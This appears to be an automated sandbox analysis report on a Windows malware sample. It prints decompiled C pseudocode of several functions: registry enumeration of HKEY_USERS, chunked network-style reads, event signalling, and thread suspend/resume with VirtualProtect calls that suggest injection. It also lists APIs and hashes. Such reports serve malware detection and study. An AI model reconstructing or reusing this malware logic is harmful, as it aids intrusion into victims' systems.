                              • GetLastError.KERNEL32(?,00000000,011075A8,?,053CB24B,00000004,00000000), ref: 053E4EAB
                              • VirtualQuery.KERNEL32(?,011075A8,0000001C,?,00000000,011075A8,?,053CB24B,00000004,00000000), ref: 053E4EC2
                              • VirtualProtect.KERNEL32(?,?,-2C9B417C,00000000,?,00000000,011075A8,?,053CB24B,00000004,00000000), ref: 053E4EE7
                              • SetLastError.KERNEL32(?,?,00000000,011075A8,?,053CB24B,00000004,00000000), ref: 053E4EF0
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: Virtual$ErrorLastProtect$Query
                              • String ID:
                              • API String ID: 148356745-0
                              • Opcode ID: 5dcd7b633f91855536026f077d82da8a9bf00142105edf9a7a2b390777991119
                              • Instruction ID: 723c67aa7c328af9afa9105a879b06b9c7dcbe6463a25214344c383758d047f2
                              • Opcode Fuzzy Hash: 5dcd7b633f91855536026f077d82da8a9bf00142105edf9a7a2b390777991119
                              • Instruction Fuzzy Hash: DE011776500219EF9F219F95CC48CAABBBDFB4C250B014426F901EB160DBB1A914DB60
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E049D4C56(void* __edx) {
                              				void* _v8;
                              				int _v12;
                              				WCHAR* _v16;
                              				void* __edi;
                              				void* __esi;
                              				void* _t23;
                              				intOrPtr _t24;
                              				void* _t26;
                              				intOrPtr _t32;
                              				intOrPtr _t35;
                              				intOrPtr _t38;
                              				void* _t40;
                              				intOrPtr _t42;
                              				void* _t45;
                              				void* _t50;
                              				void* _t52;
                              
                              				_t50 = __edx;
                              				_v12 = 0;
                              				_t23 = E049D5EF5(0,  &_v8); // executed
                              				if(_t23 != 0) {
                              					_v8 = 0;
                              				}
                              				_t24 =  *0x49dd2b8; // 0xe3a5a8
                              				_t4 = _t24 + 0x49dee10; // 0x58193b8
                              				_t5 = _t24 + 0x49dedb8; // 0x4f0053
                              				_t26 = E049DA415( &_v16, _v8, _t5, _t4); // executed
                              				_t45 = _t26;
                              				if(_t45 == 0) {
                              					StrToIntExW(_v16, 0,  &_v12);
                              					_t45 = 8;
                              					if(_v12 < _t45) {
                              						_t45 = 1;
                              						__eflags = 1;
                              					} else {
                              						_t32 =  *0x49dd2b8; // 0xe3a5a8
                              						_t11 = _t32 + 0x49dee04; // 0x58193ac
                              						_t48 = _t11;
                              						_t12 = _t32 + 0x49dedb8; // 0x4f0053
                              						_t52 = E049D5434(_t11, _t12, _t11);
                              						_t59 = _t52;
                              						if(_t52 != 0) {
                              							_t35 =  *0x49dd2b8; // 0xe3a5a8
                              							_t13 = _t35 + 0x49dee4e; // 0x30314549
                              							if(E049D3A79(_t48, _t50, _t59, _v8, _t52, _t13, 0x14) == 0) {
                              								_t61 =  *0x49dd294 - 6;
                              								if( *0x49dd294 <= 6) {
                              									_t42 =  *0x49dd2b8; // 0xe3a5a8
                              									_t15 = _t42 + 0x49ded9a; // 0x52384549
                              									E049D3A79(_t48, _t50, _t61, _v8, _t52, _t15, 0x13);
                              								}
                              							}
                              							_t38 =  *0x49dd2b8; // 0xe3a5a8
                              							_t17 = _t38 + 0x49dee48; // 0x58193f0
                              							_t18 = _t38 + 0x49dee20; // 0x680043
                              							_t40 = E049D4FA0(_v8, 0x80000001, _t52, _t18, _t17); // executed
                              							_t45 = _t40;
                              							HeapFree( *0x49dd270, 0, _t52);
                              						}
                              					}
                              					HeapFree( *0x49dd270, 0, _v16);
                              				}
                              				_t54 = _v8;
                              				if(_v8 != 0) {
                              					E049D7424(_t54);
                              				}
                              				return _t45;
                               			}

                               Instruction addresses (the report's per-line address column, collapsed): 0x049d4c56 to 0x049d4d68; entries of 0x00000000 mark decompiled lines with no address.

                              APIs
                              • StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,058193B8,00000000,?,747DF710,00000000,747DF730), ref: 049D4CA5
                              • HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,058193F0,?,00000000,30314549,00000014,004F0053,058193AC), ref: 049D4D42
                              • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,049D50D9), ref: 049D4D54
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.674779449.00000000049D1000.00000020.00020000.sdmp, Offset: 049D0000, based on PE: true
                               • Associated: 00000003.00000002.674748179.00000000049D0000.00000004.00020000.sdmp
                               • Associated: 00000003.00000002.674876280.00000000049DC000.00000002.00020000.sdmp
                               • Associated: 00000003.00000002.674899025.00000000049DD000.00000004.00020000.sdmp
                               • Associated: 00000003.00000002.674917059.00000000049DF000.00000002.00020000.sdmp
                              Similarity
                              • API ID: FreeHeap
                              • String ID: Uxt
                              • API String ID: 3298025750-1536154274
                              • Opcode ID: a3151402a055f57a11ce209063c9fc6c737c341ed7fcbcd70d80db1888bb43a2
                              • Instruction ID: ff9536ad1aff15731dfd462916c66138ded7f5fdfcc009e6f44db3b4e5bda3e2
                              • Opcode Fuzzy Hash: a3151402a055f57a11ce209063c9fc6c737c341ed7fcbcd70d80db1888bb43a2
                              • Instruction Fuzzy Hash: DD318F76900108BFEF11DFA4DD88EEA7BBDEB44704F158276E609AB060D670BE44CB60
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 50%
                              			E049D5B5B(void* __ecx, void* __edx, char _a4, void** _a8, intOrPtr* _a12, intOrPtr* _a16, intOrPtr* _a20) {
                              				void* _v8;
                              				void* __edi;
                              				intOrPtr _t18;
                              				void* _t24;
                              				void* _t30;
                              				void* _t37;
                              				void* _t40;
                              				intOrPtr _t42;
                              
                              				_t37 = __edx;
                              				_t32 = __ecx;
                              				_push(__ecx);
                              				_push(__ecx);
                              				_t42 =  *0x49dd370; // 0x5819b68
                              				_push(0x800);
                              				_push(0);
                              				_push( *0x49dd270);
                              				if( *0x49dd284 >= 5) {
                              					if(RtlAllocateHeap() == 0) {
                              						L6:
                              						_t30 = 8;
                              						L7:
                              						if(_t30 != 0) {
                              							L10:
                              							 *0x49dd284 =  *0x49dd284 + 1;
                              							L11:
                              							return _t30;
                              						}
                              						_t44 = _a4;
                              						_t40 = _v8;
                              						 *_a16 = _a4;
                              						 *_a20 = E049D47A4(_t44, _t40); // executed
                              						_t18 = E049D6A16(_t40, _t44); // executed
                              						if(_t18 != 0) {
                              							 *_a8 = _t40;
                              							 *_a12 = _t18;
                              							if( *0x49dd284 < 5) {
                              								 *0x49dd284 =  *0x49dd284 & 0x00000000;
                              							}
                              							goto L11;
                              						}
                              						_t30 = 0xbf;
                              						E049D55F1();
                              						HeapFree( *0x49dd270, 0, _t40);
                              						goto L10;
                              					}
                              					_t24 = E049D6367(_a4, _t32, _t37, _t42,  &_v8,  &_a4, _t13);
                              					L5:
                              					_t30 = _t24;
                              					goto L7;
                              				}
                              				if(RtlAllocateHeap() == 0) {
                              					goto L6;
                              				}
                              				_t24 = E049D7132(_a4, _t32, _t37, _t42,  &_v8,  &_a4, _t25);
                              				goto L5;
                              			}
                              0x049d5b5b
                              0x049d5b5b
                              0x049d5b5e
                              0x049d5b5f
                              0x049d5b69
                              0x049d5b70
                              0x049d5b75
                              0x049d5b77
                              0x049d5b7d
                              0x049d5ba5
                              0x049d5bbd
                              0x049d5bbf
                              0x049d5bc0
                              0x049d5bc2
                              0x049d5c00
                              0x049d5c00
                              0x049d5c06
                              0x049d5c0c
                              0x049d5c0c
                              0x049d5bc4
                              0x049d5bca
                              0x049d5bcd
                              0x049d5bdc
                              0x049d5bde
                              0x049d5be5
                              0x049d5c19
                              0x049d5c1e
                              0x049d5c20
                              0x049d5c22
                              0x049d5c22
                              0x00000000
                              0x049d5c20
                              0x049d5be7
                              0x049d5bec
                              0x049d5bfa
                              0x00000000
                              0x049d5bfa
                              0x049d5bb4
                              0x049d5bb9
                              0x049d5bb9
                              0x00000000
                              0x049d5bb9
                              0x049d5b87
                              0x00000000
                              0x00000000
                              0x049d5b96
                              0x00000000

                              APIs
                              • RtlAllocateHeap.NTDLL(00000000,00000800,747DF710), ref: 049D5B7F
                                • Part of subcall function 049D7132: GetTickCount.KERNEL32 ref: 049D7146
                                • Part of subcall function 049D7132: wsprintfA.USER32 ref: 049D7196
                                • Part of subcall function 049D7132: wsprintfA.USER32 ref: 049D71B3
                                • Part of subcall function 049D7132: wsprintfA.USER32 ref: 049D71DF
                                • Part of subcall function 049D7132: HeapFree.KERNEL32(00000000,?), ref: 049D71F1
                                • Part of subcall function 049D7132: wsprintfA.USER32 ref: 049D7212
                                • Part of subcall function 049D7132: HeapFree.KERNEL32(00000000,?), ref: 049D7222
                                • Part of subcall function 049D7132: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 049D7250
                                • Part of subcall function 049D7132: GetTickCount.KERNEL32 ref: 049D7261
                              • RtlAllocateHeap.NTDLL(00000000,00000800,747DF710), ref: 049D5B9D
                              • HeapFree.KERNEL32(00000000,?,?,?,049D512B,00000002,?,?,?,?), ref: 049D5BFA
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.674779449.00000000049D1000.00000020.00020000.sdmp, Offset: 049D0000, based on PE: true
                              • Associated: 00000003.00000002.674748179.00000000049D0000.00000004.00020000.sdmp
                              • Associated: 00000003.00000002.674876280.00000000049DC000.00000002.00020000.sdmp
                              • Associated: 00000003.00000002.674899025.00000000049DD000.00000004.00020000.sdmp
                              • Associated: 00000003.00000002.674917059.00000000049DF000.00000002.00020000.sdmp
                              Similarity
                              • API ID: Heap$wsprintf$AllocateFree$CountTick
                              • String ID: Uxt
                              • API String ID: 1676223858-1536154274
                              • Opcode ID: 2e3e8d7451437079ce43d718dd6c41fe6af761da5a8b2099850a5938552ee4b8
                              • Instruction ID: d6c981854f9712e8d2e5a91af1e850f5e3906434802ee75c733b8abfb06d8c94
                              • Opcode Fuzzy Hash: 2e3e8d7451437079ce43d718dd6c41fe6af761da5a8b2099850a5938552ee4b8
                              • Instruction Fuzzy Hash: 79214F75206209FFDB119FA4D940E9A3BBDEF48354F018136FA0197140EB78ED41DBA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 62%
                              			E049D4788(void* __eax) {
                              				long _v8;
                              				char _v12;
                              				char _v16;
                              				intOrPtr _v20;
                              				void* _v24;
                              				void* __esi;
                              				void* _t41;
                              				char* _t42;
                              				long _t43;
                              				void* _t46;
                              				intOrPtr _t47;
                              				intOrPtr* _t48;
                              				char _t50;
                              				long _t54;
                              				char* _t55;
                              				long _t56;
                              				intOrPtr* _t57;
                              				void* _t60;
                              				void* _t61;
                              				void* _t68;
                              				void* _t72;
                              				void* _t73;
                              				void* _t74;
                              				void* _t78;
                              
                              				_t72 = __eax;
                              				if( *((intOrPtr*)(__eax + 0xc)) != 0) {
                              					L2:
                              					_t41 = _t72;
                              					_pop(_t73);
                              					_t74 = _t41;
                              					_t42 =  &_v12;
                              					_v8 = 0;
                              					_v16 = 0;
                              					__imp__( *((intOrPtr*)(_t74 + 0x18)), _t42, _t68, _t73, _t61, _t78); // executed
                              					if(_t42 == 0) {
                              						_t43 = GetLastError();
                              						_v8 = _t43;
                              						if(_t43 == 0x2efe) {
                              							_v8 = 0;
                              							goto L29;
                              						}
                              					} else {
                              						if(_v12 == 0) {
                              							L29:
                              							 *((intOrPtr*)(_t74 + 0x30)) = 0;
                              						} else {
                              							_t46 =  *0x49dd130(0, 1,  &_v24); // executed
                              							if(_t46 != 0) {
                              								_v8 = 8;
                              							} else {
                              								_t47 = E049D55DC(0x1000);
                              								_v20 = _t47;
                              								if(_t47 == 0) {
                              									_v8 = 8;
                              								} else {
                              									goto L8;
                              									do {
                              										while(1) {
                              											L8:
                              											_t50 = _v12;
                              											if(_t50 >= 0x1000) {
                              												_t50 = 0x1000;
                              											}
                              											__imp__( *((intOrPtr*)(_t74 + 0x18)), _v20, _t50,  &_v16);
                              											if(_t50 == 0) {
                              												break;
                              											}
                              											_t57 = _v24;
                              											 *((intOrPtr*)( *_t57 + 0x10))(_t57, _v20, _v16, 0);
                              											_t18 =  &_v12;
                              											 *_t18 = _v12 - _v16;
                              											if( *_t18 != 0) {
                              												continue;
                              											} else {
                              											}
                              											L14:
                              											if(WaitForSingleObject( *0x49dd2a4, 0) != 0x102) {
                              												_v8 = 0x102;
                              											} else {
                              												_t55 =  &_v12;
                              												__imp__( *((intOrPtr*)(_t74 + 0x18)), _t55); // executed
                              												if(_t55 != 0) {
                              													goto L19;
                              												} else {
                              													_t56 = GetLastError();
                              													_v8 = _t56;
                              													if(_t56 == 0x2f78 && _v12 == 0) {
                              														_v8 = 0;
                              														goto L19;
                              													}
                              												}
                              											}
                              											L22:
                              											E049D6DFA(_v20);
                              											if(_v8 == 0) {
                              												_t54 = E049D44E4(_v24, _t74); // executed
                              												_v8 = _t54;
                              											}
                              											goto L25;
                              										}
                              										_v8 = GetLastError();
                              										goto L14;
                              										L19:
                              									} while (_v12 != 0);
                              									goto L22;
                              								}
                              								L25:
                              								_t48 = _v24;
                              								 *((intOrPtr*)( *_t48 + 8))(_t48);
                              							}
                              						}
                              					}
                              					return _v8;
                              				} else {
                              					_t60 = E049D301A(__eax); // executed
                              					if(_t60 != 0) {
                              						return _t60;
                              					} else {
                              						goto L2;
                              					}
                              				}
                              			}
                              0x049d4789
                              0x049d478f
                              0x049d479a
                              0x049d479a
                              0x049d479c
                              0x049d8a1b
                              0x049d8a1e
                              0x049d8a27
                              0x049d8a2a
                              0x049d8a2d
                              0x049d8a35
                              0x049d8b33
                              0x049d8b3e
                              0x049d8b41
                              0x049d8b43
                              0x00000000
                              0x049d8b43
                              0x049d8a3b
                              0x049d8a3e
                              0x049d8b46
                              0x049d8b46
                              0x049d8a44
                              0x049d8a4b
                              0x049d8a53
                              0x049d8b2a
                              0x049d8a59
                              0x049d8a5f
                              0x049d8a66
                              0x049d8a69
                              0x049d8b18
                              0x049d8a6f
                              0x00000000
                              0x049d8a6f
                              0x049d8a6f
                              0x049d8a6f
                              0x049d8a6f
                              0x049d8a74
                              0x049d8a76
                              0x049d8a76
                              0x049d8a83
                              0x049d8a8b
                              0x00000000
                              0x00000000
                              0x049d8a8d
                              0x049d8a9a
                              0x049d8aa0
                              0x049d8aa0
                              0x049d8aa3
                              0x00000000
                              0x00000000
                              0x049d8aa5
                              0x049d8ab0
                              0x049d8ac4
                              0x049d8afa
                              0x049d8ac6
                              0x049d8ac6
                              0x049d8acd
                              0x049d8ad5
                              0x00000000
                              0x049d8ad7
                              0x049d8ad7
                              0x049d8ae2
                              0x049d8ae5
                              0x049d8aec
                              0x00000000
                              0x049d8aec
                              0x049d8ae5
                              0x049d8ad5
                              0x049d8afd
                              0x049d8b00
                              0x049d8b08
                              0x049d8b0e
                              0x049d8b13
                              0x049d8b13
                              0x00000000
                              0x049d8b08
                              0x049d8aad
                              0x00000000
                              0x049d8aef
                              0x049d8aef
                              0x00000000
                              0x049d8af8
                              0x049d8b1f
                              0x049d8b1f
                              0x049d8b25
                              0x049d8b25
                              0x049d8a53
                              0x049d8a3e
                              0x049d8b50
                              0x049d4791
                              0x049d4791
                              0x049d4798
                              0x049d47a3
                              0x00000000
                              0x00000000
                              0x00000000
                              0x049d4798

                              APIs
                              • WaitForSingleObject.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,74785520,049D654E,?,?), ref: 049D8AB7
                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,74785520,049D654E,?,?,?), ref: 049D8AD7
                                • Part of subcall function 049D301A: wcstombs.NTDLL ref: 049D30DA
                              Memory Dump Source
                              • Source File: 00000003.00000002.674779449.00000000049D1000.00000020.00020000.sdmp, Offset: 049D0000, based on PE: true
                              • Associated: 00000003.00000002.674748179.00000000049D0000.00000004.00020000.sdmp
                              • Associated: 00000003.00000002.674876280.00000000049DC000.00000002.00020000.sdmp
                              • Associated: 00000003.00000002.674899025.00000000049DD000.00000004.00020000.sdmp
                              • Associated: 00000003.00000002.674917059.00000000049DF000.00000002.00020000.sdmp
                              Similarity
                              • API ID: ErrorLastObjectSingleWaitwcstombs
                              • String ID:
                              • API String ID: 2344289193-0
                              • Opcode ID: e79c479c55421a88ee8a81a2e09ccc1dae0d1ce7cd947fa3a1f71045cb7bd325
                              • Instruction ID: 6a0157174997cead06a3c8dc613a95ff0a896c36d145a8ef13b755c9ea3b007c
                              • Opcode Fuzzy Hash: e79c479c55421a88ee8a81a2e09ccc1dae0d1ce7cd947fa3a1f71045cb7bd325
                              • Instruction Fuzzy Hash: 2B412DB1A01209EFDF20EFA5D9849AEBBB9FF44345F10847AE512E7151E734AE80DB10
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • memset.NTDLL ref: 053C254E
                              • ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 053C25D8
                              • WaitForSingleObject.KERNEL32(00000064), ref: 053C25E6
                              • SuspendThread.KERNEL32(?), ref: 053C25F9
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: Thread$ObjectResumeSingleSuspendWaitmemset
                              • String ID:
                              • API String ID: 3168247402-0
                              • Opcode ID: 122b4a784a8726cf5b78c4ab95a233d413c50515edf4db90766f408ca7d15258
                              • Instruction ID: a5ed277b6642564ea373d37f05a6cebdf63baf523b8a9da4c0f40bfae4034cf4
                              • Opcode Fuzzy Hash: 122b4a784a8726cf5b78c4ab95a233d413c50515edf4db90766f408ca7d15258
                              • Instruction Fuzzy Hash: 15418D71108301AFE721DF54C845E6BBFEABF88754F00092DFAD4961A0DBB1D964CB62
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E049DA614(void* __ecx, intOrPtr _a4) {
                              				int* _v8;
                              				int _v12;
                              				int* _v16;
                              				int _v20;
                              				int* _v24;
                              				char* _v28;
                              				void* _v32;
                              				long _t33;
                              				char* _t35;
                              				long _t39;
                              				long _t42;
                              				intOrPtr _t47;
                              				void* _t51;
                              				long _t53;
                              
                              				_t51 = __ecx;
                              				_v8 = 0;
                              				_v16 = 0;
                              				_v12 = 0;
                              				_v24 = 0;
                              				_t33 = RegOpenKeyExA(0x80000003, 0, 0, 0x20019,  &_v32); // executed
                              				_t53 = _t33;
                              				if(_t53 != 0) {
                              					L18:
                              					return _t53;
                              				}
                              				_t53 = 8;
                              				_t35 = E049D55DC(0x104);
                              				_v28 = _t35;
                              				if(_t35 == 0) {
                              					L17:
                              					RegCloseKey(_v32);
                              					goto L18;
                              				}
                              				_v20 = 0x104;
                              				do {
                              					_v16 = _v20;
                              					_v12 = 0x104;
                              					_t39 = RegEnumKeyExA(_v32, _v8, _v28,  &_v12, 0, 0, 0, 0); // executed
                              					_t53 = _t39;
                              					if(_t53 != 0xea) {
                              						if(_t53 != 0) {
                              							L14:
                              							if(_t53 == 0x103) {
                              								_t53 = 0;
                              							}
                              							L16:
                              							E049D6DFA(_v28);
                              							goto L17;
                              						}
                              						_t42 = E049D48E5(_t51, _v32, _v28, _v24, _v12,  &_v8, _a4); // executed
                              						_t53 = _t42;
                              						if(_t53 != 0) {
                              							goto L14;
                              						}
                              						goto L12;
                              					}
                              					if(_v12 <= 0x104) {
                              						if(_v16 <= _v20) {
                              							goto L16;
                              						}
                              						E049D6DFA(_v24);
                              						_v20 = _v16;
                              						_t47 = E049D55DC(_v16);
                              						_v24 = _t47;
                              						if(_t47 != 0) {
                              							L6:
                              							_t53 = 0;
                              							goto L12;
                              						}
                              						_t53 = 8;
                              						goto L16;
                              					}
                              					_v8 = _v8 + 1;
                              					goto L6;
                              					L12:
                              				} while (WaitForSingleObject( *0x49dd2a4, 0) == 0x102);
                              				goto L16;
                              			}
                              0x049da614
                              0x049da62e
                              0x049da631
                              0x049da634
                              0x049da637
                              0x049da63a
                              0x049da640
                              0x049da644
                              0x049da71e
                              0x049da722
                              0x049da722
                              0x049da64d
                              0x049da654
                              0x049da65b
                              0x049da65e
                              0x049da713
                              0x049da716
                              0x00000000
                              0x049da71c
                              0x049da664
                              0x049da667
                              0x049da66e
                              0x049da678
                              0x049da681
                              0x049da687
                              0x049da68f
                              0x049da6c7
                              0x049da701
                              0x049da707
                              0x049da709
                              0x049da709
                              0x049da70b
                              0x049da70e
                              0x00000000
                              0x049da70e
                              0x049da6dc
                              0x049da6e1
                              0x049da6e5
                              0x00000000
                              0x00000000
                              0x00000000
                              0x049da6e5
                              0x049da694
                              0x049da6a3
                              0x00000000
                              0x00000000
                              0x049da6a8
                              0x049da6b1
                              0x049da6b4
                              0x049da6bb
                              0x049da6be
                              0x049da699
                              0x049da699
                              0x00000000
                              0x049da699
                              0x049da6c2
                              0x00000000
                              0x049da6c2
                              0x049da696
                              0x00000000
                              0x049da6e7
                              0x049da6f4
                              0x00000000

                              APIs
                              • RegOpenKeyExA.KERNEL32(80000003,00000000,00000000,00020019,?,00000000,00000000,?,?,?,?,?,049D6096,?), ref: 049DA63A
                                • Part of subcall function 049D55DC: RtlAllocateHeap.NTDLL(00000000,00000000,049D552C), ref: 049D55E8
                              • RegEnumKeyExA.KERNEL32(?,?,?,049D6096,00000000,00000000,00000000,00000000,00000104,00000000,?,?,?,?,?,049D6096), ref: 049DA681
                              • WaitForSingleObject.KERNEL32(00000000,?,?,?,049D6096,?,049D6096,?,?,?,?,?,049D6096,?), ref: 049DA6EE
                              • RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,?,?,?,049D6096,?), ref: 049DA716
                              Memory Dump Source
                              • Source File: 00000003.00000002.674779449.00000000049D1000.00000020.00020000.sdmp, Offset: 049D0000, based on PE: true
                              • Associated: 00000003.00000002.674748179.00000000049D0000.00000004.00020000.sdmp
                              • Associated: 00000003.00000002.674876280.00000000049DC000.00000002.00020000.sdmp
                              • Associated: 00000003.00000002.674899025.00000000049DD000.00000004.00020000.sdmp
                              • Associated: 00000003.00000002.674917059.00000000049DF000.00000002.00020000.sdmp
                              Similarity
                              • API ID: AllocateCloseEnumHeapObjectOpenSingleWait
                              • String ID:
                              • API String ID: 3664505660-0
                              • Opcode ID: 7eea49179f9aed8f6c7f3b2f1767618846530dc6e55ff561c69b71d929ef889b
                              • Instruction ID: 85c94c0d84393a44a9f5e18e52475407d20a8b63143608b92d68c46e271730e6
                              • Opcode Fuzzy Hash: 7eea49179f9aed8f6c7f3b2f1767618846530dc6e55ff561c69b71d929ef889b
                              • Instruction Fuzzy Hash: 83311676D00119EBDF21AFA9DC849EEFFB9EB84314F108136E911B2150D6755A90DB90
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • SysAllocString.OLEAUT32(80000002), ref: 049D6AA4
                              • SysAllocString.OLEAUT32(049D4993), ref: 049D6AE7
                              • SysFreeString.OLEAUT32(00000000), ref: 049D6AFB
                              • SysFreeString.OLEAUT32(00000000), ref: 049D6B09
                              Memory Dump Source
                              • Source File: 00000003.00000002.674779449.00000000049D1000.00000020.00020000.sdmp, Offset: 049D0000, based on PE: true
                              • Associated: 00000003.00000002.674748179.00000000049D0000.00000004.00020000.sdmp
                              • Associated: 00000003.00000002.674876280.00000000049DC000.00000002.00020000.sdmp
                              • Associated: 00000003.00000002.674899025.00000000049DD000.00000004.00020000.sdmp
                              • Associated: 00000003.00000002.674917059.00000000049DF000.00000002.00020000.sdmp
                              Similarity
                              • API ID: String$AllocFree
                              • String ID:
                              • API String ID: 344208780-0
                              • Opcode ID: 0cb2b61d57ce41378524ca7bf4d3712a7ddc92c0b7602eebdd90e9be37990b6e
                              • Instruction ID: 2004334f3826d686b13972ee6be34b0ef43fd8579c14f265c6e830e3d628dc69
                              • Opcode Fuzzy Hash: 0cb2b61d57ce41378524ca7bf4d3712a7ddc92c0b7602eebdd90e9be37990b6e
                              • Instruction Fuzzy Hash: 55312C71904109EFCB05DF98C8C08AEBBB9FF48340B10853EF90A97210E779A985CFA1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 41%
                               			// Annotated: returns 0 on success, otherwise a Win32-style error code. Flow: fill a stack context at _v32 via
                               			// E049D2E2E, acquire an optional resource into _v16, signal a named event and pause 3 s, then run either
                               			// E049DA614 (registry enumeration, see the subcall APIs below) or E049D48E5 depending on _a12; only if that
                               			// succeeds is E049D4B5B run. L12/L13 is the shared cleanup path.
                               			E049D6006(void* __ecx, void* __eflags, intOrPtr _a4, signed int* _a8, intOrPtr _a12) {
                               				intOrPtr _v12;
                               				void* _v16;
                               				void* _v28;
                               				char _v32;
                               				void* __esi;
                               				void* _t20;
                               				void* _t26;
                               				void* _t29;
                               				void* _t38;
                               				signed int* _t39;
                               				void* _t40;
                               
                               				_t36 = __ecx;
                               				_v32 = 0;
                               				asm("stosd"); // the five stosd zero the next five dwords of the stack area that starts at _v32
                               				asm("stosd");
                               				asm("stosd");
                               				asm("stosd");
                               				asm("stosd");
                               				_v12 = _a4;
                               				_t20 = E049D2E2E(__ecx,  &_v32); // executed
                               				_t38 = _t20;
                               				if(_t38 != 0) {
                               					L12:
                               					_t39 = _a8;
                               					L13:
                               					// cleanup: unless bit 0 of *_a8 is set, release whatever _a8[1] references (E049DA2A1 takes the slot's address)
                               					if(_t39 != 0 && ( *_t39 & 0x00000001) == 0) {
                               						_t23 =  &(_t39[1]);
                               						if(_t39[1] != 0) {
                               							E049DA2A1(_t23);
                               						}
                               					}
                               					return _t38;
                               				}
                               				_t26 = E049D5EF5(0x40,  &_v16); // executed; on failure _v16 is cleared so the E049D7424 release below is skipped
                               				if(_t26 != 0) {
                               					_v16 = 0;
                               				}
                               				// manual-reset event (bManualReset = 1, bInitialState = 0) whose name is the global string pointer at 0x49dd374;
                               				// lpEventAttributes points into the module's data at 0x49dd2e4. The event is set, held for 0xbb8 = 3000 ms, then closed.
                               				_t40 = CreateEventA(0x49dd2e4, 1, 0,  *0x49dd374);
                               				if(_t40 != 0) {
                               					SetEvent(_t40);
                               					Sleep(0xbb8);
                               					CloseHandle(_t40);
                               				}
                               				_push( &_v32);
                               				if(_a12 == 0) {
                               					_t29 = E049DA614(_t36); // executed; the subcall opens HKEY_USERS (0x80000003) with KEY_READ (0x20019) and walks its subkeys with RegEnumKeyExA
                               				} else {
                               					_push(0);
                               					_push(0);
                               					_push(0);
                               					_push(0);
                               					_push(0);
                               					_t29 = E049D48E5(_t36);
                               				}
                               				_t41 = _v16;
                               				_t38 = _t29;
                               				if(_v16 != 0) {
                               					E049D7424(_t41);
                               				}
                               				if(_t38 != 0) {
                               					goto L12; // the selected subcall failed: clean up and return its error code
                               				} else {
                               					_t39 = _a8;
                               					_t38 = E049D4B5B( &_v32, _t39);
                               					goto L13;
                               				}
                               			}
                               
                               Statement addresses (the per-line address column of the C-Code above, flattened here in source order; entries of 0x00000000 belong to lines with no instruction address of their own):
                               0x049d6006, 0x049d6013, 0x049d6019, 0x049d601a, 0x049d601b, 0x049d601c, 0x049d601d, 0x049d6021, 0x049d6028, 0x049d602d, 0x049d6031, 0x049d60b9, 0x049d60b9, 0x049d60bc, 0x049d60be, 0x049d60c6, 0x049d60cc, 0x049d60cf, 0x049d60cf, 0x049d60cc, 0x049d60da, 0x049d60da, 0x049d603d, 0x049d6044, 0x049d6046, 0x049d6046, 0x049d605d, 0x049d6061, 0x049d6064, 0x049d606f, 0x049d6076, 0x049d6076, 0x049d6082, 0x049d6083, 0x049d6091, 0x049d6085, 0x049d6085, 0x049d6086, 0x049d6087, 0x049d6088, 0x049d6089, 0x049d608a, 0x049d608a, 0x049d6096, 0x049d609b, 0x049d609d, 0x049d609f, 0x049d609f, 0x049d60a6, 0x00000000, 0x049d60a8, 0x049d60a8, 0x049d60b5, 0x00000000, 0x049d60b5

                              APIs
                              • CreateEventA.KERNEL32(049DD2E4,00000001,00000000,00000040,?,?,747DF710,00000000,747DF730), ref: 049D6057
                              • SetEvent.KERNEL32(00000000), ref: 049D6064
                              • Sleep.KERNEL32(00000BB8), ref: 049D606F
                              • CloseHandle.KERNEL32(00000000), ref: 049D6076
                                • Part of subcall function 049DA614: RegOpenKeyExA.KERNEL32(80000003,00000000,00000000,00020019,?,00000000,00000000,?,?,?,?,?,049D6096,?), ref: 049DA63A
                                • Part of subcall function 049DA614: RegEnumKeyExA.KERNEL32(?,?,?,049D6096,00000000,00000000,00000000,00000000,00000104,00000000,?,?,?,?,?,049D6096), ref: 049DA681
                                • Part of subcall function 049DA614: WaitForSingleObject.KERNEL32(00000000,?,?,?,049D6096,?,049D6096,?,?,?,?,?,049D6096,?), ref: 049DA6EE
                                • Part of subcall function 049DA614: RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,?,?,?,049D6096,?), ref: 049DA716
                              Memory Dump Source
                              • Source File: 00000003.00000002.674779449.00000000049D1000.00000020.00020000.sdmp, Offset: 049D0000, based on PE: true
                               • Associated: 00000003.00000002.674748179.00000000049D0000.00000004.00020000.sdmp
                               • Associated: 00000003.00000002.674876280.00000000049DC000.00000002.00020000.sdmp
                               • Associated: 00000003.00000002.674899025.00000000049DD000.00000004.00020000.sdmp
                               • Associated: 00000003.00000002.674917059.00000000049DF000.00000002.00020000.sdmp
                              Similarity
                              • API ID: CloseEvent$CreateEnumHandleObjectOpenSingleSleepWait
                              • String ID:
                              • API String ID: 891522397-0
                              • Opcode ID: d239170fc1b781cdc4b9d781ca12031daa7093360f2c6bd7e1a809638b2c7962
                              • Instruction ID: 5f7033069ee46da9f3954b91bd68efaeffe7e461955d57b6ab3326151db96cd5
                              • Opcode Fuzzy Hash: d239170fc1b781cdc4b9d781ca12031daa7093360f2c6bd7e1a809638b2c7962
                              • Instruction Fuzzy Hash: B221A472900119ABDF20AFEAC8848AEB7BDEF85354B05C536EA11E7100D735BD45CBA1
